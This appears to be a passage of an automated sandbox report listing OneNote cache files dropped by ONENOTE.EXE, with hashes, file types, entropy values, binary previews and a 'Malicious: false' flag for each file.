MD5:	4BCCCDBB4273ECEBE216C84930A8D0B2
SHA1:	FFBF617787E27BC94D9BAF89F2FE34A2BD42794B
SHA-256:	474F9A8C25D5E21192315397EA995B1E11E2C1608157C6E0277688091BFD136A
SHA-512:	DAD73A8C0E293B88685C0C71EF15E0DC95EE39B7FC9F849DE5D634173FD9FA0AF0AA96742D9E94BE03556AA4A817D5001C95A6736EAD5D5DF03661876785EB74
Malicious:	false
Preview:	......JFIF.....H.H.....C....................................................................C.......................................................................i..............................................E.....................U....V...f..ASTc.......de.1Qq...!Rb....Ca."r.................................B....................b....Ra.....!Qc.....AS.1U.."C...2Bq...$#3%&.............?......3.....~......:..g..s"......:..g..s"..ic..Vk.f.. :..f..h.....Vk.f.. :..f..h.....Vk.f.. :..f..h.....Vk.f.. :..f..h.....Vk.f.. ..0...Q_..X..V5E~..c..X...@u...cTW...0...Q_..;.m.....@w...Q.+.....4W...lUFh....v..._..wn...dW....y._..v..E~......@wn...dW....y._...v..U..@wn...d..{`;.\|U.2g....3...:.0?ViN.z.@w...4.M.:m..`~..i7...q...I....J.`l...W..n..PQTiB...6....+..sj.."...6....+..WA...x..A........(.N6`..AD.q.....'S...t.Q:.l.......f.]..N..0.. .u8..A........_W..Y...}.C...~....&.E~....&.E~....&.E~....&.E~....&.E~....&.E~....&.E~....&.E~....&.E~....&.E~....&.E~.v..?U..^.r..}..Bep

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000002E.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	4.387160040272713
Encrypted:	false
SSDEEP:	48:8s3MYd9nat2ZEp8CXW59VgchrdhSrHgUtXjxk9OY/u+:8sx9aIEpzXw9VgURAx2u
MD5:	D8AD538161B36F42E3BD9C7F6D2FDD61
SHA1:	B3EBFAAEF3909ABB5551BCEF869AF763DEFB0CBC
SHA-256:	160B2C7DE82E92CD1FA5A422BF77AB1D57B9C509A64F39040CD56CFF5AD2D804
SHA-512:	3F307D43E49554C183EFDE5EA58BE382EAE31D87BD7137BF9D2DC2FF01A6DA3303E1BD0A6BCD19522915B4C307373965231430F5A419D578920D28B20AF4E657
Malicious:	false
Preview:	2...>.......R...v...F...................................................................................................................................2...>...........v...z............................I.......I.qk..B.....LZ............O.=..........O.=.........I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'..............4.5.:}.........N...^................Q.....E..t8<..u........f........................................I.qk..B.....LZ.............4.5.:}..............4.5.:}.........................................................................j......T.].............B....H........B......>.)....J...................;........4...4...4.."........................z...y.. x.. ...........$........4...(..7(..7........................;........4...4...4......................#..............................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000002F.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPCM), density 28x28, segment length 16, baseline, precision 8, 728x77, components 3
Category:	dropped
Size (bytes):	2695
Entropy (8bit):	7.434963358385164
Encrypted:	false
SSDEEP:	48:N9YMsguOZgKAz2vcaQU4R8r4BU0/Rc4nbIQdsohw13ZmFLY6KsVvMdBL2mr:/hsEgNz2v5T/rQC67SoWniHK4EdBH
MD5:	B23DE98D5B4AFC269ED7EBFDDECE9716
SHA1:	10AF507A8079293A9AE0E3B96CF63A949B4588AA
SHA-256:	646586CB71742A2369A529876B41AF6A472C35CC508D1AE5D8395D55784814F2
SHA-512:	BBACBE205EC0A4F4E3AB7E2B1DEE36FCF087DDF77C7D18B53AEA4B15984A47C64E19F9B8D8FA568620619CEA0361D94FE7ABEA6E502EC6ECAEFE957F42ED7EE8
Malicious:	false
Preview:	......JFIF.............C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222......M....".......................................,.......................1....!ABQRq.2a."CbS.......................................................Qa1A............?....{............i........l..-D.q.~..\|cS.S...R\..d.8,!.....]f$....Q..di.;~5......vj......MqCe..=..f^..=.}.Cm]qCd..s=..u.e..v..t'.,.....S.s..N...>.d4'.,..k...N...d..9....G...y....6J.Y.l.{Vf...^B..i.3.z....:5W#4@.S\fj.%..Mb.5.v.5......S.E..#.v.I.....I......m..H....D..\|.Y\|...W.Wf..o..U.0.E..@.T.....................................'.S../...Z......!J..1K..rI...T.f.>.+.N..o.....\..^u........e..q.qK.GXP..-...F8".;5J...]Y......j.a.,R.......J.N........z}<qu..J.)`.}X:..}.............B...[. ......,B.).b.......(Y.O....c\.o.e&.W.#Bo..N\|..N8.#J.>1D.1..b.&....q.#..UT%,.d.....m&..^...VXA..b.nbTV~.....^........q..#./.I..=Q..=..Y..Ib...VZ+......Y.........'.

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000002G.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	4.3285340687331955
Encrypted:	false
SSDEEP:	96:EsEf7y9DN9P0E/bOiX8Z1N9BYQRA71GbeqeA4:EsEf7y9DNhB/bOiX8Zb9BYQRA7sbeqeA
MD5:	4A2456491E77FFBC6259984AB32C6D54
SHA1:	816E947B1FC02E3D44D25DD3A0E779E34A1FC9D6
SHA-256:	A1168CFBC89E47D438AD235146ED971CF80653D76BCC244B8F9EA73EC1FA7D0D
SHA-512:	00FCA446B62685FF7B75212B22FCDD4772A9B40DCCE8AF1AB14FD4211BA78A3814C409B2B6A09513391A5F62A0AC7B3A7A0F333ABDFE80B132CA9313103FF5E5
Malicious:	false
Preview:	2...>.......R...v...F...................................................................................................................................2...>...........v...z.......................................n../.XG1....I.......I.qk..B.....LZ....n../.XG1........I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'................9........Z.....N...^...............5j...,.N.C............f........................................I.qk..B.....LZ...............9........Z............9........Z.........................................................................j.......T.]...............B.....H.........B.......>.).....J...................;........4...4...4.."...........................z...y.. x.. ...........$........4...(..7(..7........................;........4...4...4........................#...............................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000002H.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, baseline, precision 8, 69x630, components 3
Category:	dropped
Size (bytes):	11040
Entropy (8bit):	7.929583162638891
Encrypted:	false
SSDEEP:	192:u99+91V42ho91V42ho91V42ho91V4235z9pUkDCyixxo4PS6b8tEy3BcWWhhSy0b:ubKD4/D4/D4/D4uzX38u4PNYJ2zhhmb
MD5:	02775A1E41CF53AC771D820003903913
SHA1:	2951A94A05ECF65E86D44C3C663B9B44BAD2BC9D
SHA-256:	83245F217DEAE4A4143B565E13C045DBB32A9063E8C6B2E43BB15CD76C5F9219
SHA-512:	5A1FCC24BDD5EE16BC2C9BACF45BCECF35ED895EAC22D2C4EE99C1B7E79C8E8B9E5186E3D026BA08FF70E08113F0A88FBF5E61C57AF4F3EA9BA80CE9F33410E9
Malicious:	false
Preview:	......JFIF.....H.H.....C....................................................................C.......................................................................v.E.............................................S..........................Aa..!12Qqw.....3568rv........".....4Btu.....#Rs.(W..bg.................................D.....................1..2.!4Aqrs....Qa......t..."3BRb....#.$S.Cc..............?...K/h._+.N6.-.a...5...;.r....,...0B.s(..zp..4.%r\|q..E.Q^.../...C.R..?u.q8XN.>.e..:..gJ...._.n>.70G,..(........3b.&.5m...Q../...7Ie..k....e.l6..&..`Gt.P.Y^r...=..Y.e...N.B...O.#..J+........u.V;G.'.....V.]8..C.]..........E.....c..w&lX..f..\T.J?...F.,..m\|..93........,.....+.R..WG...%.....(@.....p].iEz<.8.^...J.h.....a8P.1......(z..y~.........H.Z^.>..<.....L.k..IG...R.(.%..m....&u...B\|.....@]ey.W.J...!d..R.8...[..>8....(.G......!.)X.....,'..F2.Z.t..Aw./..Z..#..i.kK.......b.i...qR.(....RE.............O.XP.#..(...9J..]...,.2.[w....KrW'...tY.......{~.:.+..

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000002I.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	8192
Entropy (8bit):	2.6963100705797025
Encrypted:	false
SSDEEP:	48:fWesKdjuU2JleQtUEP3F74hXe9kLacgrdHrnDtXxrPYd7oBP:+es6jutbeQWEP3FEhXe9kLaJRLDTB
MD5:	9A42A1E8F701A8866860D358E343AC51
SHA1:	F9E085A431DDEC5A7C9CC5B80621BAAE8DBC3007
SHA-256:	FF0557D67A182B76366E120595CD69E3EDFE06B1CDE541EDF608E37E13006B34
SHA-512:	A08A5D21B40F6A22EC0FA9448BA15AF0A7F22B580B43D4162B5E52A66FCEA2DAFDBDD9A33250A3855D886A22C0096194A3DCA924F5B5D54219066FFBD07792CA
Malicious:	false
Preview:	X...d...,.......t.......................................................................................................................................X...d...........t................................I.qk..B.....LZ.........................e.G.....................e.G....X...d...........t.............................I.......I...................................................I.t.....I................................................................4..'...'...............................................................?.......?......................................................................................... ....I.qk..B.....LZ....L..........L.......L.......L...........................................Lj......LT%c....L.......L..G....L..H....L..>....L.......L .3...................;........4...4...4.."................L...L...L..z...y.. x.. ...........$........4...(..7(..7........................;........4...4...4...........L.......L....#..L............................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000002J.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPCM), density 28x28, segment length 16, baseline, precision 8, 105x441, components 3
Category:	dropped
Size (bytes):	2268
Entropy (8bit):	7.384274251000273
Encrypted:	false
SSDEEP:	48:N9YMn9H5gXlM26vroVXWxyNnl1LmLR+rn4FOeewGhDbby:/h9SlMdgm09ll8R2/rby
MD5:	09A7AE94AA8E517298A9618A13D6E0E2
SHA1:	FA5181A7414BA32F816BF0C4278EC20C615E8B1A
SHA-256:	3C68C7EE798E62A4A99C740153F3980D7DF029605C843410942C7F85E794823B
SHA-512:	074E9A2BE2039D0AFEAD360157550B934FABD0CB86B5AF476C1FBC885EE60331F5A68EAF70BF76E23C8248A20FB900346839F4AA8892370B5889E64948DCC6E2
Malicious:	false
Preview:	......JFIF.............C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222........i..".......................................3......................!.A..1Q."q.2BRa.b...#$................................... .......................!12AqQ.............?..D.z.4....;.....7...3.t<!..d.O.....+O+.;.z6.4cz7E.........U.Z)-..@..y...........}(W...<.xv/...5.ew......yN....n.Tk.Tm.Ty.vA=...T..U....h...e.8.5%....'......e^......L.g.$.~e..O.._...... .F`.....xnL.<.......]jfv...}..\G..c.......-%...#.C.\|.].`..^..W..c..B..5D.QSTaZ.5A=....BU..z%.4.h.6..=..U...W.$..l...7.:...........IPQT_...~..i..x....~.l.\|.n.J..TV.21.Tg.....................j.z!+.-............"j.j...)..TT...."....T.Tc.j..............j.z!.h...&.&.&..e.%..TksTW%G.?".l+$..c._9..[x...TU..........i~X..#'.qm?ttO.....}.i...q.....9..r..?..W..d.w...f;..q...tZh..0.....2.......OD%Q-.......$......56.K.O...y._.._C.k..p9.p..O..vu...'........0v

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000002K.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPCM), density 28x28, segment length 16, baseline, precision 8, 76x97, components 3
Category:	dropped
Size (bytes):	784
Entropy (8bit):	6.962539208465222
Encrypted:	false
SSDEEP:	12:869YM8fij0W/xfuCp7ovv1bidiMn3bGi6AETQcdH8SADjoZgV6v9jUEvS3/g:N9YMWeI424diMn3yinsQeHvADu9QEvJ
MD5:	14105A831FE32590E52C2E2E41879624
SHA1:	078FA63FC7DB5830E9059DF02D56882240429D90
SHA-256:	D0A3A1C3CD63C4023FE5716CBE2C211307D0E277E444D9EF76C7FC097A845FD4
SHA-512:	8FC0ED24E8EC14C46EA523D9265DE28F85C5FC57AA54AD5B9CA162E95F79221E2AD3DD67D1293CF756B67F3D3DECAE122254134EA8D4D00DDED02114B5383947
Malicious:	false
Preview:	......JFIF.............C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222......a.L..".......................................-........................!A."1.Qbq....2Ba.........................................................1............?.....3.Ty\......vs....>.>..a.W..s89.d...Z}......rz...`...Z.r.do....u.W.%....gf.>.L..xz....B8=w...g.~g."HD...$..IKJ......nn..ly..I....L...\q...Q;6.KrxZ.,...j$..ZQ..)f...q`...C1..cZ2]-..\.~..J.....^..(.f..9m?..C.NI.UL..X.fy.Z.........+n....r."Z...d..R./\.#...kd.D.5.!...h.3*s-+.......Xjt..}i..rK..y.../>u..]N.....Y..J......1.x./.....F6.......I...._3...k.sM.+..v;.%\|.f.~.......:y....S....UKovh...W'........lF... .................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000002L.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	OpenPGP Public Key
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	2.5107075683417617
Encrypted:	false
SSDEEP:	48:+aWSdNcUlTQ16WUlII56QUleEUlEBvHUlohp:FWL+Q16WzI5LsXH
MD5:	3193D250FDDF3A4CC286DB9390E24503
SHA1:	342936DDB108B29433B8E0ECE91AE337629A9A3D
SHA-256:	0753FC4FDC025D9201836008C822B7A1E5E1AFAB6E273246B15C5DEF094644D8
SHA-512:	4167E2090F9F723AE52B6B9432743592280B7B100F289DE244FBB788A53A23BF926632E540C0E9BEABAEFBD7206C04E178AA5EEB0AC9A725714064EB635C29C8
Malicious:	false
Preview:	......................................?.................................................................................................................................................................._......._.k.....YZG..^.p.!.....p.!.FIM. .R. ..,...4...u.;qy...,..._.k.....YZG..^.._..p.!.FIM. .R. .p.!...........................................................................j.....`.....8...7...8...Q...8...Z...8...b...8...n....................4..~...1...(...(.......C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.M.i.c.r.o.s.o.f.t. .O.f.f.i.c.e.\.r.o.o.t.\.T.e.m.p.l.a.t.e.s.\.1.0.3.3.\.O.N.E.N.O.T.E.\.1.6.\.S.t.a.t.i.o.n.e.r.y.......S.t.a.t.i.o.n.e.r.y.............1.......S.t.a.t.i.o.n.e.r.y.............8...1... ..$....S.t.a.t.i.o.n.e.r.y................._....%O...................@.(iq..U.2...............................p.!.....................................p.!..c..,.......................p.!..c..,0............6....B.JS2...\|................8...8...1... ..$....S.t.a.t.i.o.n.e.r.y...........

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000002M.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	12288
Entropy (8bit):	4.61411781055748
Encrypted:	false
SSDEEP:	96:lo6DX/pdFuNAwYvXPlcT0LG1pq6Q6QhQT3aAL/uERkVESYldo7ktFwdi9eTxo:u67pdFJjSiw6QL3lVGxo
MD5:	93C8EAF998EA0309F72C3307C6D29AC3
SHA1:	830AB1A9A7D1BAAC5DB507EEF427E47BED9432E8
SHA-256:	917A9D2430D639B710819AA51992602664256D53C8A85681733825F82AE47568
SHA-512:	B1B2FD0ACCB1F20DD9BF3E1377E9CFEC1256C073C5BFDF7C642D91EA62468F3FEE151B5D99B6EBFE7133D720F27017A54DDAD0A94BABAD8430388E8675F95BCF
Malicious:	false
Preview:	.......@...........@......................................................................................................................................\.......\..^.I.NYT.J.............I...C.;..................x.\|D.0.5V..............I...C.;.........I...C.;..............x.\|D.0.5V.........\..^.I.NYT.J....\.........................................................................N.2.......(.....`......................................................4..~...1...(...(...h...C.:.\.U.s.e.r.s.\.A.r.t.h.u.r.\.A.p.p.D.a.t.a.\.R.o.a.m.i.n.g.\.M.i.c.r.o.s.o.f.t.\.T.e.m.p.l.a.t.e.s.......T.e.m.p.l.a.t.e.s...............1.......T.e.m.p.l.a.t.e.s...................1... ..$....T.e.m.p.l.a.t.e.s.........h.......h..L.c.I.........O......O\.U.E.......E2.......&...T....... ................O...\...f.0.{........................\..c..,..............Pa%.-x.A..@...N.....N...^................gm....G.V.l.................................................................................hzTm=.E.G.Sy...........gm.

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000002N.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	0.7449316888901347
Encrypted:	false
SSDEEP:	12:DaC8l8oHgKBTFXDwVhEiDwVZNWDwVhvcQEu:OHl8beaVh6VZNpVu
MD5:	69B7E4EE37E10541EB5E6E0974230EDE
SHA1:	E59ECF57F45317709244BE46A4334155EFD901AD
SHA-256:	F9241E5971F7CEBA21B8A11B3A62DE93AB4BDC9C24322CBA6DB6867CE80C2F59
SHA-512:	A7E4A1B772DE13B553A9D62A4ABE6D79ECDA7354518876B4919AA905D050ED1FE77BB95200070F833824200A39A62961F872EC6C77928A0359343408D6A0099C
Malicious:	false
Preview:	2...>..........................?......................................................................................................................................................................../ 7...../ 7...O...GG.:5j5R.....j5R.-.(A.O)..2.ej5R.-.(A.O)..2.ej5R./ 7...O...GG.:5/ 7..............................j5R.....j5R.................................................j5R..#..j5R\....j5RN.!....................................................4..1...(...(.......L.i.v.e.C.o.n.t.e.n.t...........1.......L.i.v.e.C.o.n.t.e.n.t............../ 7..c..,...................j5R..1... ..$....L.i.v.e.C.o.n.t.e.n.t.............+M_.].BK..pEJo.....N...^...........................................................................................................+M_.].BK..pEJo.....................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000002O.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	OpenPGP Secret Key
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	0.914703509816407
Encrypted:	false
SSDEEP:	12:zPyvBgz5c1/kn1J4GOQgCA1s9lgxKqQE4Kl0:za5gzp1J4GBc1s9lghZ
MD5:	D20C030B53A8192670BAC733CCB2415D
SHA1:	EF19735A32C13A4CB7B46889E6AA5C679E15BFDF
SHA-256:	1535C297F0786C78F5E7836060B8AE73DA7822A9D52F45A663538C7DA58F8FD2
SHA-512:	48EF6F8DA152F8B16D7522A843888B7694E74FDF44B2A319303F73BCD8CB59972F638B6F708B61D6DE03D1C5C79AD4EBBF423761A8CED588733360B1F0392E38
Malicious:	false
Preview:	....>....................................................................................................................................................................................................;O......;O.5.tC.....`'............z..N...i..a..;O.5.tC.....`'.;O....y.5.D..z7.4.........z..N...i..a...............................................................................+.....\.......N.......N.)...............................................c..,.........................4..1...(...(.......1.6.................1... ..$....1.6..................y.5.D..z7.4.............z..N...i..a.2................................;O.......................................;O..c..,............................1... ..$....1.6............h!...rD..cO"y.!....N...^............................................................................................................h!...rD..cO"y.!............................................................................................................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000002P.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	OpenPGP Public Key
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	1.5119232392044595
Encrypted:	false
SSDEEP:	12:KWJKPVEk7k7CPT8NwIUa7EUasXMkFmr1xIrEUa+wCkpV5wDcIHrEUahw/1r1pTIw:K1O00kRylmKrlchWHrl9uHCrll3c
MD5:	A60678610CFE801180B876D36070E250
SHA1:	4F6DD770F4C6C9297D0BA5DAD0B9D1A0ADD10E1B
SHA-256:	0176F1B44BCAAB58B87AFA97C75B286E807B99016B172F084D5F5A8F05730BB8
SHA-512:	332AAC4CBD46EFCA6EFA8FB5D3EE82479A8D6FAA2C3208F4FAAAEAD964B1CF22804E45E31E22E040DFA715945C11E42A601B337BB0AD5055CBC6809E01124D5F
Malicious:	false
Preview:	.........................................................................................................................................................................................................5.......58..kN.q.>.\|....O.......O. ..@..T{..,[..O. ..@..T{..,[..O..U..B.JG.pp./Zf^.U......\.G.H..0.................O.......O...................................................O..B....O\......ON......ON.....ON.7....ON.@...............................c..,.........................4..1...(...(.......M.a.n.a.g.e.d............O..1... ..$....M.a.n.a.g.e.d.............N.i.....N.i...K..yl.....U.......U..B.JG.pp./Zf.2.................................O.N.i...................................U...c..,.....................O...O..1... ..$....M.a.n.a.g.e.d.............\.G.H..0......N.i...K..yl....N.i...58..kN.q.>.\|....5.....>................U..B.JG.pp./Zf^...........................................5..c..,.....................O...O...O..1... ..$....M.a.n.a.g.e.d.........................\.G.H..0...

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000002Q.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	0.7126528614026032
Encrypted:	false
SSDEEP:	6:jxfEXEjXzPaEA0aEAazUufY/2HqUKHx8CAXCkKaWWAXl++iAjcw1EUAtK:KUjjap0apHgY+KOXnKaW9XlUPQEUAK
MD5:	05FE9E7678300BA9B62B81E47202C379
SHA1:	73DA16987BD1FB3D27EB3A55426BD7C688B33C12
SHA-256:	035F2A07A9DFC47770DF4C4E99140F5B4326A9663945F56BFB18623ACBD1ADDB
SHA-512:	80C7297336972C2870978B84C0C0589861DBD2FB4A67B2C2ABC9F2DB7058D1A8ED5995131627D65AA3FCDDC5E63B4CECC891B2AC0B24FADE59C8243EBC7F4E3A
Malicious:	false
Preview:	2...>...................................................................................................................................................................................................~.......~...\|.oK.!.g.9..tem.....tem..f.G...#....tem..f.G...#....tem.~...\|.oK.!.g.9..~................................tem.....tem.................................................tem..!..tem\....temN....................................................~....c..,.........................4..1...(...(... ...D.o.c.u.m.e.n.t. .T.h.e.m.e.s..........tem..1... ..$ ...D.o.c.u.m.e.n.t. .T.h.e.m.e.s....................@.!.'........N...^..................................................................................................................@.!.'................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000002R.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	0.47843155407951077
Encrypted:	false
SSDEEP:	6:NTc4oSK+gjkuauK+gjba8ji2pqlyLx8Olu3afiaeljlcw1E9aeltlK:Vc4oys8eRlV38iawlcQE9ah
MD5:	4FE773BB727EBCDEA1712DBF9895040C
SHA1:	86B71A58D1CDF6B40A1229CEDFEFCC5551740B35
SHA-256:	05E67938825C75057FA8A6494A72FA8FE9EE238EE6B71D347D2F8D9E39FC4FB8
SHA-512:	8DC2916C722EB6D248723A67174C85B539D0EBDA59FF2AAF8910F9172FC16B79DA42DF30D5837A65A02FC68899B7384414D924BCC239C4ABFFB54AAEFACF52F4
Malicious:	false
Preview:	2...>...........~.......................................................................................................................................................................................j.F.....j.F7..^G.#..A.@.........................j.F7..^G.#..A.@.j.F..................................................j.F.....j.F.................................................j.F.....j.F\..............................................................4..1...(...(.......1.0.3.3.........1.......1.0.3.3.....al..M.N.....1....N...^.............................................................................................................al..M.N.....1............................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000002S.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	0.7337614712920891
Encrypted:	false
SSDEEP:	12:KUCNyBqysdljltUvhzeIWU7eIWc11vNQELvl:KUGyoyaZmzh73N3
MD5:	F31EA1ED4F8A4C394A5A81F74C4DAE95
SHA1:	36AC069850F0BB8E333A0334B14A558D3AED1083
SHA-256:	5FEF58418BC70D29FA22A60A09D504FAB8F004065D16F899F20800C5B49C2E04
SHA-512:	18DE2400CE0270560FD90525D3F3377E3036FE9B84EB62776A7C4085D379662EBBA1975185AF2CB4B35BAAA58C99EBB3914DD6C41896DB6508A3F99A12242357
Malicious:	false
Preview:	2...>.....................................................................................................................................................................................................9.......9....B.....tC.........5._.G...Wl.L#..9....B.....tC..9...5._.G...Wl.L#..................................9.......9...................................................9.."....9\......9N........................................................c..,.........................4..1...(...(...$...S.m.a.r.t.A.r.t. .G.r.a.p.h.i.c.s................9..1... ..$$...S.m.a.r.t.A.r.t. .G.r.a.p.h.i.c.s.........f.s..G..0W......N...^...........................................................................................................f.s..G..0W......................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000002T.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	0.4693374260840487
Encrypted:	false
SSDEEP:	6:NTcZJsJtlRcT/ln17tlyLx8Olu3afsBhYw1ExBhk:VcghspXlV38sXYQExXk
MD5:	408BE078C05637E3A32EC6F072BC7F8B
SHA1:	A0DB4D627A81E04B17EA20C03580D8263B5060ED
SHA-256:	0FFD0A281489D4ECBDE46E4CEB80635ACBA2E72D26E0E83DA4070CF4A05650FD
SHA-512:	05A0E212AC4356CA2B3E8F633EE5F654D531411248C4AC132D5AA0F2054773D248ADC1DB8F54D5ED38978751038C2A463A015A0729E75F4DAD246754BC649ACD
Malicious:	false
Preview:	2...>...........~........................................................................................................................................................................................5.......5..2..B...R.n...........................5..2..B...R.n...5....................................................5.......5...................................................5.......5.\..............................................................4..1...(...(.......1.0.3.3.........1.......1.0.3.3...?\.q...F......h.....N...^...........................................................................................................?\.q...F......h.............................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000002U.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	0.644250042985299
Encrypted:	false
SSDEEP:	6:UWBEqqm/QdzVeWEVKELx88cbrMkq2Sz1MQQcbrMkq2Sz1PVl50mw1E3Vl560:UeEM6zVr89nkNYKQQnkNYpzumQE3zj
MD5:	D649CAE49805754A10A5E892EDDD24B6
SHA1:	519874C06480836B7455F9E1E8E205BD17EBF5D0
SHA-256:	45072E608D43DC6BBC6A38F10E263FE7FDDB7B3D17C9DC8154881790CD8478BD
SHA-512:	A2608B2697B4D23F0274A184E10170288FB4F34FEA95ABF74F539BD02618B4AEE75765799395B78F01E0E97BBA1B23CCD729309460E25167E8FA005EB6FF1E7E
Malicious:	false
Preview:	2...>....................................................................................................................................................................................................09......09.{..L...=EJs}.........................09.{..L...=EJs}.09...................................................09......09..................................................09.."...09\..............................................................4..1...(...(...D...W.o.r.d. .D.o.c.u.m.e.n.t. .B.i.b.l.i.o.g.r.a.p.h.y. .S.t.y.l.e.s...............1...D...W.o.r.d. .D.o.c.u.m.e.n.t. .B.i.b.l.i.o.g.r.a.p.h.y. .S.t.y.l.e.s...............@..X@.Wa.....N...^.................................................................................................................@..X@.Wa.............................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000002V.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	0.7975238540035654
Encrypted:	false
SSDEEP:	6:+wxRXE7/n3IJ+xCEL/Pc64V9x80cHnD2nHlXoDwcHnD2nHlE6bsqw1E7cbsS:+wfEzn3I6CEWsD4GwsD4CdqQE7S
MD5:	65834A5773B832D2FF723B6976855E5A
SHA1:	D80D8127158F7B7857B9ECEB247963A36C5FF872
SHA-256:	6B554B2D58616709A557C7F67000DCC37E757253A92FE4A4CF3A6DB4253F4DF7
SHA-512:	DAA6D27D1E0BA431BEECF00E7906BD566B2C2687237C74D02490DD6A6AE32504A1873BFB5C63A5D062843C00905B364A65D9FDADA7C0B755D2FF11CA554DEB08
Malicious:	false
Preview:	2...>...................................................................................................................................................................................................rA,.....rA,...oI....I`z6..C.......C..Y\E..$.^..t..C..Y\E..$.^..t..C.rA,...oI....I`z6rA,................................C.......C...................................................C..#....C\......CN....................................................rA,..c..,.........................4..1...(...(...<...W.o.r.d. .D.o.c.u.m.e.n.t. .B.u.i.l.d.i.n.g. .B.l.o.c.k.s................C..1... ..$<...W.o.r.d. .D.o.c.u.m.e.n.t. .B.u.i.l.d.i.n.g. .B.l.o.c.k.s.........a....QL......~.....N...^...........................................................................................................a....QL......~.....................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000030.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	0.47672790062196657
Encrypted:	false
SSDEEP:	6:NTcwd9/WLaCkTMkNeyLx8Olu3af4Q5Dw1E/Q5P:Vcwd9/W2GueV3835DQEo5P
MD5:	510FD97531459A564DE5DEF1752AB5F3
SHA1:	2F2E8A12DD55EC191C9FE6A03BB4C121639197E8
SHA-256:	3CAB7ABE63C8A22817EC48A2B1ADC66930C9262EBEEC70211D48659368AE130E
SHA-512:	646A00BA12FC9008A76277627BD0BA594B688E3BFEF7D2D721E68F49C1382F079E33CF7A51185DCC19DF2CF772F1653D0A2825A9A7AF9C18027856A15AAE8301
Malicious:	false
